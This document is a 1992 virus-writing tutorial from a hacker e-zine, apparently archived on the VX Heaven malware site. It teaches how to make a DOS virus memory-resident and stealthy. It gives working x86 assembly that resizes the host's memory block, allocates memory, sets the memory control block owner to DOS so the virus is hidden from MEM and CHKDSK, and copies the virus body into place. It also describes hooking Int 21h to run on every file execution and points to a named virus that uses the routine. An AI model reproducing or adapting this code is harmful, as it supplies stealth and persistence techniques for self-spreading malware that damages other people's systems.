VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Memory Stealth

Rock Steady
Nuke Info Journal [4]
August 1992

[Back to index] [Comments]

The Advantages of having a Memory Resident Virus, are unlimited. When our virus goes `TSR' it REALLY doesn't do ANYTHING. It just stays there, waiting to be called upon. the 80x86 really doesn't MULTITASK, so don't think the virus runs `in the Background' TSRs tend to hook on Interrupts, depending what function they must do. If it must be called upon OFTEN, hook Int 1C, if your must run when an File is Executed/Open/Close Hook Int 21h. And everytime Int 21h is called, Your Virus Runs FIRST, then it calls the original Int 21h.

I will try to explain on how cut off a block of Memory, Then we'll allocate memory for the Virus, change the program MCB, and move the virus resident in memory.

para_size       equ     3

        mov     cx,es               ;Get current Segment
        dec     cx                  ;Subtract 1, so we have MCB
        mov     es,cx               ;Restore it back to ES
        mov     bx,es:para_size     ;BX=MCB Size in Paragraphs
        mov     dx,virus_size       ;DX=Virus Size
        mov     cl,4                ;Unfortunately, VirusSize is in Bytes
        shr     dx,cl               ;While memory size is calculated in
        add     dx,4                ;paragraphs (16-Byte)
        mov     cx,es               ;Start to Restore the Old Segment in ES
        sub     bx,dx               ;oh, yeah, Minus Virus - Current memory
        inc     cx                  ;Increment CX
        mov     es,cx               ;Put it back, NOTICE a PUSH ES + POP ES
        mov     ah,4ah              ;would have been BETTER!!!!!
        int     21h                 ;Call Dos to Adjust Memory block Size

; First part has been easily completed, Next code, Allocates Memory for
; the Virus...
        jc      exit_com            ;Test, incase Error Happened
        mov     ah,48h              ;Allocate Memory function
        dec     dx
        mov     bx,dx               ;Number of 16-Byte Paragraphs to
        int     21h                 ;Allocate

; Next this Function Returns the Segment of the Allocated memory Block
; in AX register. So edit its MCB and move the virus resident.
mem         equ      2        ;Put theses with the rest...
        jc      exit_com            ;Another Test for Errors...
        dec     ax                  ;Get it MCB
        mov     es,ax               ;Put it into ES
        mov     cx,8h
        mov     es:mem,cx           ;Fix MCB PSP blocks Owner
        sub     ax,0fh
        mov     di,103h             ;Offset of where virus will start.
        mov     es,ax               ;With is Segment
        mov     si,bp               ;Put BP (Delta Offset) in SI
        add     si,offset init_virus ;Add to point to the begining of Virus
        mov     cx,virus_size       ;How many Bytes to move?
        cld                         ;Clear Direction Flag (Ascending)
        repne   movsb               ;Copy from DS:SI to ES:DI

That is all needed to do the trick. And it will not show up with the Memory Mapping Utilities like MEM or CHKDSK. However Dos will report Available memory to be short by the Number of Paragraphs we Allocated. I will try to fix this DARN thing that drives me crazy, I believe it can be solved like our FCB Dir Method, Where we can add the Number of Paragraphs our Virus Allocated back to them Memory Mapping Utilities. There IS a WAY! And we will find it... This topic will be continued in Info Journal #5.

                                Rock Steady
              `Check out N-PoX(es) to see this Routine Working'
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka